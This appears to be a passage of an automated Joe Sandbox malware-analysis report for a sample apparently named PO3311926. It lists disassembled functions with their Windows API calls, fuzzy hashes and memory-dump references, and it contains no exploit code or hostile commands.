Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 0b8660682bef1c73ec13c9219c59b855dd6a48a9b56cb0cea994284a61622187
Instruction ID: b39a6a932fbb1818e1eb64e3d7264a29a567d341a9a7e5ba8ad01f64c6884697
Opcode Fuzzy Hash: 0b8660682bef1c73ec13c9219c59b855dd6a48a9b56cb0cea994284a61622187
Instruction Fuzzy Hash: 45E09B7140428826DF11A764DC06FEE3BEC9B05785F040891B205DB1F3DAB4D6108661

Uniqueness

Uniqueness Score: -1.00%

Function 00BB081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 77b0e033a88dd57e4d9a7fce633f57feb41eb4bf12777db05680a9a4fbd84ab9
Instruction ID: 1b86bd2a0febe746e011dffd19da384db57830b3b69fe237aaec55a34ede2a38
Opcode Fuzzy Hash: 77b0e033a88dd57e4d9a7fce633f57feb41eb4bf12777db05680a9a4fbd84ab9
Instruction Fuzzy Hash: 37E012764011186BDB11A7A4DC05FEA7BECFF09791F0400A57645D2005EAB4DA848BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BBA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BBA3E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 5a45544072efd1a3df8d0dcf86362f2efe2759cbee2d31c8b441d023e9029a20
Instruction ID: 4b9d0fdba12477a0fb52e5b03353164c72c9e1353806390108d7f0c63c34f89b
Opcode Fuzzy Hash: 5a45544072efd1a3df8d0dcf86362f2efe2759cbee2d31c8b441d023e9029a20
Instruction Fuzzy Hash: AEE0ED71900218EBCB20DF55C5417E9BBE8EF04360F10849AA85693211E3B4AE44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BC2BB5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: a1bffcd7e0a5fa17c57419c2f9de19d9e5a42e4c99dbc681d999ac5b37a560f4
Instruction ID: 8f9277643ac11203c3d696a4e700294b881ebbac8c8090cc316b25c76acdb69f
Opcode Fuzzy Hash: a1bffcd7e0a5fa17c57419c2f9de19d9e5a42e4c99dbc681d999ac5b37a560f4
Instruction Fuzzy Hash: 18D0223825430098AC147F742A0BF4933C9ED41F74BE082EEF4308A4C1EE109C80A011

Uniqueness

Uniqueness Score: -1.00%

Function 00BA12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BA1306
ShowWindow.USER32(00000000), ref: 00BA130D

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: f11acd719a5787cd8992936d810eb78b4d1a3b7f7280bb8be3a5015634cbc5c8
Instruction ID: d5925a79b3bf909edf974a0b031815079384363706a3dc75157ed18cfd6d8603
Opcode Fuzzy Hash: f11acd719a5787cd8992936d810eb78b4d1a3b7f7280bb8be3a5015634cbc5c8
Instruction Fuzzy Hash: E0C0123225C280BECB010BB4DC09E2FBBACABA9312F06C908B0A5C0060C238C110DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BA12D3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BA12E1
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00BA12E8

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CallbackDispatcherItemUser
String ID:
API String ID: 4250310104-0
Opcode ID: 5adab7c101d6102fe0d46e1731a5094d50304ae2d28a02202d3c80bb9b7430b8
Instruction ID: b7ea7a186d07c3bac22694796feaf36d0698dfbc095baaf68b0aaf3785009996
Opcode Fuzzy Hash: 5adab7c101d6102fe0d46e1731a5094d50304ae2d28a02202d3c80bb9b7430b8
Instruction Fuzzy Hash: A2C04C7640C280FFCB015BA09C0CE2FBFADAB9D311F05C809B1A580120C735C510DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA1A09

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7368eb03ce4dbc9940f1c74c25c4cb3af7743a5e68232d72557cc8a7130d1658
Instruction ID: 629d85d001a2aba27df3a68589f56c32d426e59ca8a7ed13a7e9d1f0174fbaca
Opcode Fuzzy Hash: 7368eb03ce4dbc9940f1c74c25c4cb3af7743a5e68232d72557cc8a7130d1658
Instruction Fuzzy Hash: 09C19E70A08254AFEF55CF6CC494BA97BE5EF1A310F0809FAEC559F292DB309944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA3BBF

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d401fe0a4608fce027e6c649f26fceb8b3495163bc6132197e502813d8fa5ec8
Instruction ID: 17c99a12c87ce855eab5c54711ecb7882c55215c0b1cdfc88c2a584c8f7f1009
Opcode Fuzzy Hash: d401fe0a4608fce027e6c649f26fceb8b3495163bc6132197e502813d8fa5ec8
Instruction Fuzzy Hash: 2371C271508B849EDB35DB74CC919E7B7E9EF16700F4009AEF1AB87241EA326684DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA8289

Part of subcall function 00BA13DC: __EH_prolog.LIBCMT ref: 00BA13E1

Part of subcall function 00BAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 2f8c56d73abd57a66eb212a0fae029164f81e5d15815292cc6c905a27c663fc3
Instruction ID: d5f46ce1a9ad6583a8a59467e8a6a85f29f1da25f3c73cee2ebb2a93453a2a2b
Opcode Fuzzy Hash: 2f8c56d73abd57a66eb212a0fae029164f81e5d15815292cc6c905a27c663fc3
Instruction Fuzzy Hash: 7141A4719486589ADF20DB60CC55AEAB7F8EF06304F4404EBE08A97593EF755EC8CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA13E1

Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C

Part of subcall function 00BACE40: __EH_prolog.LIBCMT ref: 00BACE45

Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cc5d02d070214824bd712ab7790d6f4faed244fe7bc3b01cc07455ab50604073
Instruction ID: a205e60c25790c5248e28b03593b45ca4ed193a45c1301f472758f5cfc42aff7
Opcode Fuzzy Hash: cc5d02d070214824bd712ab7790d6f4faed244fe7bc3b01cc07455ab50604073
Instruction Fuzzy Hash: D6415AB0909B409EE724CF3D8885AE6FBE5BF29300F50496ED5FE83282CB716654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA13E1

Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C

Part of subcall function 00BACE40: __EH_prolog.LIBCMT ref: 00BACE45

Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ef78132cd5787fab9996f5b82abde86bd3a19e72a4027f05778b0492b1c8c10
Instruction ID: 22f4f4b390f298f32cff9d3b7abe2228282ad367b899a2b849e1d649c4be895c
Opcode Fuzzy Hash: 7ef78132cd5787fab9996f5b82abde86bd3a19e72a4027f05778b0492b1c8c10
Instruction Fuzzy Hash: 884158B0905B409EE724DF798885AE6FBE5FF29300F54496ED5FE83282CB726654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BB359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB35A3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 29d1f63217dbc9316492adc6414ba72e609c2509fc21ef1c3928ac8894253b78
Instruction ID: 20fbe151585af3869b8579d5cbe40a421998138013bd28ff2f48e441fb64677e
Opcode Fuzzy Hash: 29d1f63217dbc9316492adc6414ba72e609c2509fc21ef1c3928ac8894253b78
Instruction Fuzzy Hash: 1021E6B1E40211ABDB149F74CC416FA77E8FB18714F1401BAA516EA681D3F0DA00C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBB098

Part of subcall function 00BA13DC: __EH_prolog.LIBCMT ref: 00BA13E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2ce4ed44be9da57607f250bd2711a867d59f188a94ced19461f78c881dda8682
Instruction ID: 3131c52ca0d733dda6cd854db42089c0afa781cdab96d112ef33fd29ff26ceca
Opcode Fuzzy Hash: 2ce4ed44be9da57607f250bd2711a867d59f188a94ced19461f78c881dda8682
Instruction Fuzzy Hash: B8315871814249ABCB15DFA8C891AFEBBF4AF09304F1048DEE409B7242D7B5AE048B61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BCACF8

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 58cdde6bb3ecc64d457460f9b30ec5c179a532ccf056e21c5fefb0cb3fd47741
Instruction ID: 4b48fdae11595a46b758902aac36ca7325cbaf2adb494ef07a62dadf8138c080
Opcode Fuzzy Hash: 58cdde6bb3ecc64d457460f9b30ec5c179a532ccf056e21c5fefb0cb3fd47741
Instruction Fuzzy Hash: 22110A33A0162D6F9B219E18DC50F5BB3D5EB8432971642A5FD26EB254EB30DC0187D2

Uniqueness

Uniqueness Score: -1.00%

Function 00BACE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BACE45

Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7a59b356bf623dfd26d024ca4ff0da4da207943cc1dd68ccd18f4a036fc61aaa
Instruction ID: 487ddd5e51792fbaa5fbf6da03ac4def0d8ffac720c283cf678029798bb85708
Opcode Fuzzy Hash: 7a59b356bf623dfd26d024ca4ff0da4da207943cc1dd68ccd18f4a036fc61aaa
Instruction Fuzzy Hash: 33118671A09244DEEB25DB79C5457EEBBE8DF45300F10449EE446D3282DBB89F04C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA921A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 16c223ca42c389179cc9f5a151989fbbc87e6eef19a6da311592d80b623b6177
Instruction ID: 03b6f6e63fd44ed06b2151e92b21756b4e4ed9f69d4417c211d955bf2b40b80b
Opcode Fuzzy Hash: 16c223ca42c389179cc9f5a151989fbbc87e6eef19a6da311592d80b623b6177
Instruction Fuzzy Hash: D701A533D04528ABCF12ABA8CC81ADEB7F1EF8A750F0145A5F812B7212DA34CD04D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00BCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BCB177

_free.LIBCMT ref: 00BCC4E5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: bfeb0fc328f59235fd31524a500bad0dd69e061c5c9c93f5bb50f966c0527c8c
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: C90126726003056BE3358E699881E6AFBECEB95330F25056DE19893281EB30A905C724

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BCB177

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9206d85d8342b1daba7545f00b862635f6dd7ee7c9a8996f1501d4791a2aaa97
Instruction ID: d10b579038144ea35ff46d84b827159ea8ea66ccae6aea06387c56fd8ec0c31b
Opcode Fuzzy Hash: 9206d85d8342b1daba7545f00b862635f6dd7ee7c9a8996f1501d4791a2aaa97
Instruction Fuzzy Hash: 18F0B43262512477DB255A21AC2BF9F77C8EF41760F1D81DDB808B7190CF31D90186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BC3C3F

Memory Dump Source

